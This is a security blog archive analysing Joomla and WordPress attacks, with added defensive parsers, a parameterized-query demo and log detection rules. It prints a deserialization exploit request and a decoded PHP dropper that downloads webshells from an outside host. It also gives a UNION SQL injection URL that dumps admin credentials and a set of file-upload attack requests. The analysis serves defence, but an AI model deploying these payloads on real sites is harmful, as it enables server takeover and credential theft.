Showing posts with label Joomla. Show all posts

Thursday, September 1, 2016

Joomla DeSerialize Deobfuscation 101

Saw this web request; it is the Joomla unserialize vulnerability. Below I walk through how to see what it is doing.

GET /

}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3738:\"eval(base64_decode('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'));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd


Joomla wasn't validating input, and when it deserialized the blob above it would actually evaluate and execute part of it. Execute what, you may ask? Take the base64 encoded string, do a quick decode, and you get:

$check = $_SERVER['DOCUMENT_ROOT'] . "/media/xxxx.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('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'));
fclose($fp);


Above you see they are opening a new file in your web root folder called xxxx.php and writing something to it. Writing what, you may ask? Let's base64 decode that something as well. Ah, interesting, we get the PHP code below:

<?php
function http_get($url){
  $im = curl_init($url);
  curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($im, CURLOPT_HEADER, 0);
  return curl_exec($im);
  curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/media/css.php" ;
$text = http_get('http://mrtg.ui.phinma.edu.ph/components/joomla.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
  echo $check."
";
}else
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/media/jmail.php" ;
$text2 = http_get('http://mrtg.ui.phinma.edu.ph/components/jmailz.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
  echo $check2."
";
}else
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/H.htm" ;
$text3 = http_get('');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/media/check.php" ;
$text4 = http_get('http://mrtg.ui.phinma.edu.ph/components/qq.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "//media/jmails.php" ;
$text5 = http_get('http://mrtg.ui.phinma.edu.ph/components/qqz.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
$text6 = http_get('http://pastebin.com/raw/UHAGT887');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

$toz = "";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen ' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);

?>


Now the attacker can access the file on your site at www.mysite.com/media/xxxx.php. As soon as he does, the PHP code above creates another file called css.php whose contents are fetched from the malicious URL hxxp://mrtg.ui.phinma.edu.ph/components/joomla.txt. In fact it does this over and over, creating a bunch of backdoors or webshells, so that even if the good guy finds and removes one or two of these files, the attacker will still have a way back onto your compromised machine. Finally, at the end, an email is sent to indicate the code ran successfully.
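The decoding above can be scripted rather than done by hand. The following is an added example of mine, not code from the post: a small reader for PHP's serialize() format that parses a request of this shape, strips the session-key prefix and the NUL-byte markers PHP puts on private/protected property names, and then recursively decodes every eval(base64_decode('...')) it finds, so both hops (the dropper, then the file body the dropper writes) fall out of one run. The sample request is constructed to mirror the structure of the real one, with a harmless two-stage stand-in payload; the class and property names are the ones visible in the request. One assumption is labelled in the code: the \0 sequences in the logged request are treated as single NUL bytes, because the declared string lengths only add up that way. A raw log should be decoded as latin-1 before parsing, since PHP's lengths are byte counts.

```python
import base64
import re
from collections import namedtuple

PhpObject = namedtuple("PhpObject", "cls props")  # class name + property dict
B64_CALL = re.compile(r"base64_decode\('([A-Za-z0-9+/=]+)'\)")  # the pattern in the request

def unescape_logged(text):
    # Undo the log's escaping: \" -> " and \\0 -> NUL byte. Assumption: each \0 is a single
    # NUL; the declared length s:21:"\0\0\0disconnectHandlers" only adds up (3 + 18) that way.
    return text.replace("\\\\0", "\x00").replace('\\"', '"')

class PhpUnserializer:
    # Minimal reader for PHP serialize() output (i, b, d, s, a, O). Lengths are byte counts,
    # so decode raw log bytes as latin-1 first to keep one character per byte.
    def __init__(self, data, pos=0):
        self.s, self.i = data, pos

    def _count(self):  # reads the <n>: that follows a type letter, e.g. s:8: or a:1:
        end = self.s.index(":", self.i + 2)
        n, self.i = int(self.s[self.i + 2:end]), end + 1
        return n

    def _quoted(self, n):  # reads "<n bytes>" by declared length, exactly as PHP does
        val = self.s[self.i + 1:self.i + 1 + n]
        self.i += n + 2
        return val

    def parse(self):
        t = self.s[self.i]
        if t in "ibd":
            end = self.s.index(";", self.i)
            raw, self.i = self.s[self.i + 2:end], end + 1
            return {"i": int, "d": float, "b": lambda v: v == "1"}[t](raw)
        if t == "s":
            val = self._quoted(self._count())
            self.i += 1  # trailing ';'
            return val
        if t == "a":
            n, out = self._count(), {}
            self.i += 1  # '{'
            for _ in range(n):
                key = self.parse()
                out[key] = self.parse()
            self.i += 1  # '}'
            return out
        if t == "O":
            cls = self._quoted(self._count())
            end = self.s.index(":", self.i + 1)
            n, self.i = int(self.s[self.i + 1:end]), end + 2  # past ':' and '{'
            obj = PhpObject(cls, {})
            for _ in range(n):
                name = self.parse().split("\x00")[-1]  # drop the \0Class\0 / \0*\0 prefix
                obj.props[name] = self.parse()
            self.i += 1  # '}'
            return obj
        raise ValueError("unknown type %r at offset %d" % (t, self.i))

def parse_request(logged):
    # Text before '|' is the session-key prefix (}__test); parsing ends with the top-level
    # object, so trailing junk such as \xf0\xfd\xfd\xfd is never read.
    data = unescape_logged(logged)
    return PhpUnserializer(data, data.index("|") + 1).parse()

def find_payloads(node, path="", depth=0, out=None):
    # Walk the tree; each string holding base64_decode('...') is decoded and the result is
    # searched again, which reproduces the two decode hops done by hand in the post.
    out = [] if out is None else out
    if isinstance(node, PhpObject):
        for k, v in node.props.items():
            find_payloads(v, "%s/%s.%s" % (path, node.cls, k), 0, out)
    elif isinstance(node, dict):
        for k, v in node.items():
            find_payloads(v, "%s[%s]" % (path, k), 0, out)
    elif isinstance(node, str):
        for m in B64_CALL.finditer(node):
            try:
                decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
            except ValueError:
                continue
            out.append((path, depth + 1, decoded))
            find_payloads(decoded, path, depth + 1, out)
    return out

_b64 = lambda s: base64.b64encode(s.encode()).decode()
_s = lambda v: 's:%d:"%s";' % (len(v), v)  # PHP string token with the byte length it expects
# Constructed sample with the shape of the logged request; the payload is a harmless two-hop
# stand-in (stage 1 writes a file, stage 2 is that file's body), not the real dropper.
STAGE2_PHP = '<?php echo "constructed stage 2";'
STAGE1_PHP = "$fp=fopen($_SERVER['DOCUMENT_ROOT'].'/media/xxxx.php','w+');fwrite($fp,base64_decode('%s'));fclose($fp);" % _b64(STAGE2_PHP)
SAMPLE_REQUEST = (
    '}__test|O:21:"JDatabaseDriverMysqli":3:{' + _s("fc") + 'O:17:"JSimplepieFactory":0:{}'
    + _s("\x00\x00\x00disconnectHandlers") + 'a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{'
    + _s("sanitize") + 'O:20:"JDatabaseDriverMysql":0:{}' + _s("feed_url")
    + _s("eval(base64_decode('%s'));JFactory::getConfig();exit" % _b64(STAGE1_PHP))
    + _s("cache_name_function") + _s("assert") + _s("cache") + "b:1;"
    + _s("cache_class") + 'O:20:"JDatabaseDriverMysql":0:{}}i:1;' + _s("init") + "}}"
    + _s("\x00\x00\x00connection") + "b:1;}\xf0\xfd\xfd\xfd"
)
```

Running find_payloads(parse_request(SAMPLE_REQUEST)) returns one entry per decode hop, each tagged with the path of the property that carried it (here SimplePie.feed_url inside disconnectHandlers), so a triage note can say exactly which field held the code. The parsed tree also makes the object class names visible at a glance; none of them belong in session data that a web client is allowed to supply.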

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, August 2, 2016

Joomla SQL Injection Walk-Through

I saw this pastebin post with a Joomla SQL injection exploit Perl script that I thought was interesting enough to write a bit about.

Upon reviewing the code I see that the exploit constructs a URL such as

http://victim.com/index.php?option=com_jumi&fileid=93&Itemid=117+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/jos_users+--+

This appears to exploit the 'Itemid' parameter of the Joomla com_jumi component, which must not be properly sanitizing user input and thus allows SQL commands to be injected and executed against the database.

It's likely that behind the scenes the Joomla developers are performing a query on the database such as

   select |24 fields| from |itemtable| where Itemid = HttpRequest["ItemId"]

But since they aren't sanitizing the ItemId parameter, an attacker can enter a value such as the one below. Notice that the + signs in the URL above are simply a way to encode spaces, so I've removed them. Also notice that /**/ is just an empty comment that does nothing except obfuscate, so it can safely be removed for analysis. Finally, 0x3a is the hex equivalent of the colon character (:), so I've replaced it too for simplicity.

   ItemId=117 UNION SELECT 1,concat(username,':',password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from jos_users --

So you see above that we first pass in an actual item id (117) so that the query returns at least a single record. Next there is a "union select", which means we're going to union (concatenate, join) the results of the SQL query defined by the developer with a SQL query we define ourselves. In order to union or combine 2 SQL queries the number of columns must match, which is the reason you see 24 columns (23 of them are integer values that the system would automatically cast/convert into strings if needed). The attacker must know that column #2 is the one the website displays on the screen in the HTML response, so they choose to put their exfiltrated data in column #2. What they display is the username and password concatenated together from the jos_users table. It is likely that the 1st record in this table is the Joomla administrator, thus if this attack is successful the administrative username and password will be displayed to the browser.

To prevent this as a Sys Admin of a Joomla site, upgrade and patch as soon as patches are available. If you see active exploits, implement an IPS (intrusion prevention system) that allows you to block malicious looking requests like this.

To prevent this as a web developer, use strongly typed, parameterized SQL queries so that an integer (like ItemId) cannot be turned into a string. Also use a standard security library that sanitizes or encodes malicious-looking characters like +, /, *, or -.
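As an added example (mine, not from the post or the pastebin script), here is the query shape above built against an in-memory SQLite database, so the two points can be checked rather than taken on faith: the column counts of the two halves of the UNION must line up, and a bound, integer-typed parameter stops the injection outright. Table and column names are constructed stand-ins for the Joomla tables, MySQL's concat() is written as SQLite's || operator, and the admin row holds a made-up password value.

```python
import sqlite3

COLUMNS = 24  # the injected UNION carries 24 columns, so the developer's query must too


def build_db():
    # Constructed stand-in for the tables the post reasons about: an item table with 24
    # columns (Itemid first, the displayed text second) and jos_users with one admin row.
    conn = sqlite3.connect(":memory:")
    cols = ["Itemid INTEGER", "title TEXT"] + ["c%d INTEGER" % i for i in range(3, COLUMNS + 1)]
    conn.execute("CREATE TABLE jumi_items (%s)" % ", ".join(cols))
    row = ["117", "'Welcome page'"] + [str(i) for i in range(3, COLUMNS + 1)]
    conn.execute("INSERT INTO jumi_items VALUES (%s)" % ", ".join(row))
    conn.execute("CREATE TABLE jos_users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO jos_users VALUES ('admin', 'constructed_hash_value')")
    return conn


def union_payload(width):
    # The post's Itemid value, with MySQL's concat() written as SQLite's || operator.
    # `width` is the column count the attacker guessed; 24 is the value in the post.
    tail = ",".join(str(i) for i in range(3, width + 1))
    return "117 UNION SELECT 1,username || ':' || password,%s from jos_users --" % tail


def vulnerable_lookup(conn, itemid_param):
    # The pattern the post infers: the request value is pasted straight into the SQL text.
    return conn.execute("SELECT * FROM jumi_items WHERE Itemid = " + itemid_param).fetchall()


def parameterized_lookup(conn, itemid_param):
    # A bound parameter is only ever compared as a value; it is never parsed as SQL.
    sql = "SELECT * FROM jumi_items WHERE Itemid = ?"
    return conn.execute(sql, (itemid_param,)).fetchall()


def typed_lookup(conn, itemid_param):
    # Strongly typed, as the post recommends: a non-integer value is rejected before the
    # database is even asked (int() raises ValueError on the injected string).
    return parameterized_lookup(conn, int(itemid_param))


def displayed(rows):
    # What the page would render: column #2 of every returned row.
    return [row[1] for row in rows]


if __name__ == "__main__":
    conn = build_db()
    print("normal request  :", displayed(vulnerable_lookup(conn, "117")))
    print("vulnerable query:", displayed(vulnerable_lookup(conn, union_payload(COLUMNS))))
    print("bound parameter :", displayed(parameterized_lookup(conn, union_payload(COLUMNS))))
    try:
        typed_lookup(conn, union_payload(COLUMNS))
    except ValueError as exc:
        print("typed parameter : rejected (%s)" % exc)
```

With the vulnerable lookup the rendered column #2 contains both the real item title and admin:constructed_hash_value; with 23 columns instead of 24 the database refuses the UNION, which is why an attacker has to get the width right. The bound-parameter version returns nothing for the injected value (it is compared as a whole string against an integer column), and the typed version never reaches the database at all.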


Tuesday, May 31, 2016

A File Upload Vulnerability barrage

I noticed a series of WordPress/Joomla file upload attacks from a single IP address / attacker in a short period of time. Some of the requests were listed here. What I found interesting was not the fact that most were well-known WordPress vulnerabilities that are still unpatched by many web administrators. What I found interesting was the methodology of the malicious actor. They have likely written some sort of script/automated scanning tool, perhaps even a botnet, that is doing this automatically. I envision that the code/script doing this probably has an array or list of well-known WordPress file upload vulnerabilities. It's probably a flexible, dynamic list, so that as soon as the attacker hears about a new WordPress file upload vulnerability he can literally just add a URL path and a POST parameter for the file name, and the script/botnet will start scanning and attacking the internet trying to upload malicious files. Then there is likely a follow-up script that runs shortly after and connects to the uploaded backdoors to validate which ones were successful. In all the cases below the attacker uploads the same malicious file name, upfilees.php, so that he can easily go back later and determine whether this was a device he compromised. The backdoor is probably a web shell that gives them full access to the web server's file system and the ability to run commands on the web server. Below I did my best to research a few of the attacks seen in this cycle and explain them a bit.

yiw_contact[]=upfilees.php
yiw_action=sendemail


In the above HTTP POST there were 2 parameters that started with yiw. This indicates the attacker is likely trying to exploit the Beauty & Clean Theme File Upload WordPress Vulnerability, which is literally as simple as posting your backdoor file in the contact field with the sendemail action. If it succeeds, your file has been uploaded to the web server.

POST /uploadify/uploadify.php
Filedata=upfilees.php


In the next HTTP POST, the attacker is likely attempting to exploit the Event Calendar Arbitrary File Upload WordPress Vulnerability, which is also as simple as passing the file you want uploaded as a POST parameter to the uploadify.php page. Again, if successful, the attacker has just uploaded a PHP web page to your server and can now do whatever they please.

POST /tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=
Filedata=upfilees.php.suspected
Filename=send.php.suspected


In the next HTTP POST, the attacker is trying to exploit the tinybrowser Remote File Upload Joomla Vulnerability, another simple vulnerability that involves posting the file you want uploaded as a parameter to the upload_file.php page. We're getting a bit repetitive and non-creative with these vulnerabilities, aren't we?

update_file=upfilees.php
action=revslider_ajax_action


In the next HTTP POST, the attacker is trying to exploit the RevSlider WordPress File Upload Vulnerability, which again requires nothing more than choosing the right action parameter and posting the file, and guess what, the web server is compromised with a nice PHP backdoor. Oops.

POST /sites/all/libraries/elfinder/php/connector.minimal.php
upload[]=upfilees.php
cmd=upload


In the next HTTP POST, the attacker appears to be looking for poorly configured systems that have purposely enabled the elFinder file manager, which lets you remotely manage your web server's file system. Hmmm, can that be exploited? Yep, just post the upload command and your backdoor, and the attacker is in business.

POST /license.php
filename=upfilees.php


The final attack, I believe, may just be a standard filename/location that certain attackers or botnets use to exploit systems. They probably exploited this server at some point and added a backdoor called 'license.php' which allows arbitrary file upload. So this attacker is just taking advantage of another attacker's prior compromise of this device. Easy pickings if it exists.

WordPress & Joomla plugins should not be trusted (like anything else, for that matter) and should only be added if absolutely needed. If you do need them, then you had better be certain to keep them patched and updated. If you have a plugin that is really not necessary, please, please, please remove those extraneous plugins, as otherwise they're going to open up huge, ugly, gaping holes in your security posture.
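The requests above are easy to spot one at a time; what the post really describes is the pattern across them. As an added example of mine (not the post's), the script below runs a few detection rules built only from the endpoints, parameter names and action values quoted above over a constructed request log, then correlates the hits the way the post reasons: a burst of flagged POSTs from one IP, the same uploaded file name reused across several endpoints, and a later GET to that file name as the attacker checks which uploads worked. The log format, the IP addresses and the two paths the post does not give (for the yiw and RevSlider requests) are placeholders.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Endpoints, parameter names and action values taken from the requests quoted in the post.
UPLOAD_ENDPOINTS = {
    "/uploadify/uploadify.php": "Event Calendar uploadify",
    "/tiny_mce/plugins/tinybrowser/upload_file.php": "tinybrowser upload_file",
    "/sites/all/libraries/elfinder/php/connector.minimal.php": "elFinder connector",
    "/license.php": "license.php (backdoor left by an earlier compromise)",
}
UPLOAD_PARAMS = {"yiw_contact[]", "Filedata", "Filename", "update_file", "upload[]", "filename"}
ACTION_MARKERS = {("yiw_action", "sendemail"), ("action", "revslider_ajax_action"), ("cmd", "upload")}
PHP_NAME = re.compile(r"\.php(\.\w+)?$", re.I)  # .php and renamed forms such as .php.suspected

# Constructed log format: <utc timestamp> <client ip> "<method> <path>" <post body or ->
LINE = re.compile(r'^(\S+) (\S+) "(\w+) ([^" ?]+)[^"]*" (.*)$')


def parse_line(line):
    ts, ip, method, path, body = LINE.match(line).groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "ip": ip,
            "method": method, "path": path, "params": parse_qs(body)}


def uploaded_names(rec):
    # File names carried in a known upload parameter that end in .php (or a renamed .php).
    return {v for n, vals in rec["params"].items() if n in UPLOAD_PARAMS
            for v in vals if PHP_NAME.search(v)}


def classify(rec):
    # Reasons a single POST looks like one of the upload attempts in the post (empty if none).
    reasons = []
    if rec["method"] != "POST":
        return reasons
    if rec["path"] in UPLOAD_ENDPOINTS:
        reasons.append("known upload endpoint: " + UPLOAD_ENDPOINTS[rec["path"]])
    for name, values in rec["params"].items():
        for v in values:
            if name in UPLOAD_PARAMS and PHP_NAME.search(v):
                reasons.append("php file name in upload parameter %s=%s" % (name, v))
            if (name, v) in ACTION_MARKERS:
                reasons.append("upload action marker %s=%s" % (name, v))
    return reasons


def correlate(lines, window=timedelta(minutes=10), threshold=3):
    # Ties the single requests together the way the post describes the actor: a burst of
    # attempts from one IP, one file name reused across endpoints, and a later GET to it.
    records = [parse_line(line) for line in lines]
    hits = [(rec, classify(rec)) for rec in records]
    by_ip, by_name = defaultdict(list), defaultdict(set)
    for rec, reasons in hits:
        if reasons:
            by_ip[rec["ip"]].append(rec["ts"])
            for name in uploaded_names(rec):
                by_name[name].add(rec["path"])
    bursts = {}
    for ip, times in by_ip.items():
        times.sort()
        for i, start in enumerate(times):  # count flagged attempts inside a sliding window
            n = sum(1 for t in times[i:] if t - start <= window)
            if n >= threshold:
                bursts[ip] = max(bursts.get(ip, 0), n)
    checkins = [(rec["ip"], rec["path"]) for rec in records
                if rec["method"] == "GET" and rec["path"].rsplit("/", 1)[-1] in by_name]
    return {"flagged": sum(1 for _, r in hits if r), "bursts": bursts,
            "by_name": dict(by_name), "checkins": checkins}


# Constructed sample mirroring the six requests in the post plus one benign POST and a
# follow-up GET; paths the post does not give (the yiw and RevSlider ones) are placeholders.
SAMPLE_LOG = [
    '2016-05-31T10:00:01Z 198.51.100.23 "POST /index.php" yiw_contact[]=upfilees.php&yiw_action=sendemail',
    '2016-05-31T10:00:14Z 198.51.100.23 "POST /uploadify/uploadify.php" Filedata=upfilees.php',
    '2016-05-31T10:00:29Z 198.51.100.23 "POST /tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file" Filedata=upfilees.php.suspected&Filename=send.php.suspected',
    '2016-05-31T10:00:45Z 198.51.100.23 "POST /index.php" update_file=upfilees.php&action=revslider_ajax_action',
    '2016-05-31T10:01:02Z 198.51.100.23 "POST /sites/all/libraries/elfinder/php/connector.minimal.php" upload[]=upfilees.php&cmd=upload',
    '2016-05-31T10:01:20Z 198.51.100.23 "POST /license.php" filename=upfilees.php',
    '2016-05-31T10:02:10Z 203.0.113.5 "POST /wp-comments-post.php" comment=nice+post&author=bob',
    '2016-05-31T10:09:30Z 198.51.100.23 "GET /uploadify/upfilees.php" -',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(line.split('"')[1], "->", classify(parse_line(line)) or "clean")
    print(correlate(SAMPLE_LOG))
```

On the sample, the six attack POSTs are flagged, the comment POST is clean, the single source IP shows up as a burst of six attempts inside the window, upfilees.php is seen against four distinct endpoints, and the later GET for /uploadify/upfilees.php is reported as a check-in on a name that was just uploaded. The file-name pivot is the cheapest of these to keep: because the actor reuses one name everywhere, a single alert on that name in any upload parameter, or any request for it afterwards, covers the whole list of plugins at once.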
